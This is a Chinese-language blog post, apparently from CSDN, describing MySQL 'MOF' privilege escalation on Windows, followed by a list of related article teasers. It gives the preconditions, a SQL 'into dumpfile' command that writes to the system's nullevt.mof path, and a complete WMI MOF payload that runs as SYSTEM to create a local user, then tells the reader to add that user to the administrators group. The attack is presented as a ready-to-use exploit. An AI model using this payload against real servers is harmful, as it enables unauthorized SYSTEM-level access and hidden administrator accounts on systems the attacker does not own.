0x00 mof提权原理

类似于之前的udf提权,参考https://blog.csdn.net/qq_53577336/article/details/119700116
另外一种mysql提权方式叫做mof提权
在windows系统下 (在c:/windows/system32/wbem/ mof /nullevt. mof)存在一个mof文件,他的特点是,每个极短一段时间,便会以system权限自动运行文件内脚本,mof提权就是将我们写好的mof文件导入到该目录该文件里门,让他自行执行我们的语句,达到我们想要的效果

0x01 提权条件

1)获取到对方mysql的shell,或者是获取到mysql账号密码,能够调用mysql语句
2)目录可写入
对方mysql具有insert和delete权限,也就是可写可删除添加能够创建目录,写入文件
验证是否可写:

show global variables like 'secure%';


如果secure_file_priv值为空则可写,为指定路劲则是指定路劲可写,需要全部可写需要在mysql.ini配置文件添加语句:即可

secure_file_priv=

secure_file_priv是限制函数在哪个目录下拥有上传或者读取文件的权限

0x02 提权exp

利用MySQL将文件写入目录

select load_file('mof文件路径') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'

#pragma namespace(“\\\\.\\root\\subscription”)
instance of __EventFilter as $EventFilter
{
EventNamespace = “Root\\Cimv2”;
Name = “filtP2”;
Query = “Select * From __InstanceModificationEvent “
“Where TargetInstance Isa \”Win32_LocalTime\” “
“And TargetInstance.Second = 5”;
QueryLanguage = “WQL”;
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = “consPCSV2”;
ScriptingEngine = “JScript”;
ScriptText =
“var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user secist 123 /add\”)“;
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};

执行完毕替换net user hsy 123456 /add换为
net localgroup administrators hsy/add 即可将用户提升管理员权限

交流学习:
博客:http://www.kxsy.work
CSND社区:告白热

Mysql-mof提权相关推荐

  1. mysql mof_关于mysql mof提权研究

    无意中看到有关mysql的这种提权方式,趁着有空余时间便研究了起来,发现网上有挺多地方写的不够详细的,研究的时候也卡壳了一段时间. 利用前提:操作系统为windows 操作系统版本不宜太高,2008测 ...

  2. mysql mof提权原理_[原创]WEB安全第六章提权篇12 mof提权

    WEB安全第六章提权篇12 mof提权 1.mof是什么 托管对象格式 (MOF) 文件是创建和注册提供程序.事件类别和事件的简便方法.在 MOF 文件中创建类实例和类定义后,可以对该文件进行编译.编 ...

  3. 113.网络安全渗透测试—[权限提升篇11]—[Windows 2003 Mysql MOF提权]

    我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 1.mof提权原理: 2.mof提权限制: 3.mof提权过程: (1)实验环境: (2)靶机链接: (3)实验 ...

  4. mysql mof提权原理_mof提权原理及实现

    关于 mof 提权的原理其实很简单,就是利用了c:/windows/system32/wbem/mof/目录下的 nullevt.mof文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的c ...

  5. mysql mof提权原理_mof提权原理及其过程

    mof提权的原理: mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就 ...

  6. mysql mof提权_MySQL_MOF提权

    一.原理 Windows管理规范(WMI)提供了如下三种方法编译WMI存储库的托管对象格式(MOF)文件: 将MOF文件执行为命令行参数及Mofcomp.exe文件 使用IMofCompiler接口和 ...

  7. mysql mof提权原理_Mof提权科普

    首先呢先谢谢米爷在我弄这个的时候把我骂开窍了- -. 不多说了~.~像名称一样哈~ 首先呢是朋友扔我一shell 他提权差就给咱了,简单的看了下,是php脚本的,一看php脚本就肯定带有,mysql. ...

  8. mysql mof提权原理_关于mysql mof提权研究

    无意中看到有关mysql的这种提权方式,趁着有空余时间便研究了起来,发现网上有挺多地方写的不够详细的,研究的时候也卡壳了一段时间. 利用前提:操作系统为windows 操作系统版本不宜太高,2008测 ...

  9. mysql mof提权_MySQL提权之mof提权

    mof提权原理 关于 mof 提权的原理其实很简单,就是利用了 c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次 ...

  10. mysql mof提权_三、mysql 之mof提权学习

    一.测试环境 win2003 + phpnow 二.使用条件 mysql + root权限 三.工具准备 (1)工具1: 准备好mof提权脚本(具体mof脚本,已上传网盘) (2)工具2: 准备好菜刀 ...

最新文章

  1. 如何优雅地展示机器学习项目!
  2. Server 对象 错误 'ASP 0177 : 800401f3' Server.CreateObject 失败解决方案
  3. python算法与数据结构-顺序表(39)
  4. Pandas数据结构简介
  5. HBase的BulkLoad详解
  6. iPhone 12/13正面对比图曝光:祖传大刘海终于有所改变
  7. 演讲《云图,让阅读更精彩(Better Cloudary™, Better Reading)》
  8. 一年之后 重温旧“梦”
  9. asp.net 用正则表达式过滤内容中的电话,qq,email
  10. 新手建网站笔记(四)--快捷键
  11. Python 标准库 —— urllib(下载进度)
  12. 文荣:7月24日阿里云上海峰会网络大神
  13. 二级c语言考试改卷标准,计算机二级c语言考试技巧
  14. power automate desktop获取股票网页数据
  15. 刀片服务器显示如何切换,刀片机服务器切换
  16. 小米动态图标+android实现,创新设计动态图标
  17. Redis 实战指南
  18. MeasureSpec类
  19. 基于OCR的身份证要素提取-2019
  20. 清理xcode模拟器_mac太卡,清除xcode和模拟器缓存

热门文章

  1. 高中计算机学科知识,《信息技术学科知识与教学能力》(高级中学)
  2. Laravel常用扩展sanctum与medoo的使用
  3. 如何用示波器导出csv数据
  4. STM32G431介绍
  5. 安卓系统耗电太快?针对wakelock(唤醒锁)的设置优化教程
  6. 通过kubeode安装k8s
  7. C语言实现简单通讯录
  8. 如何比较两个字符串的大小
  9. 三维激光扫描后处理软件_3d扫描仪三维激光扫描仪以及后处理软件被广泛应用于公路铁路航空水利港口等项目...
  10. 基于51单片机自动售货机设计全套资料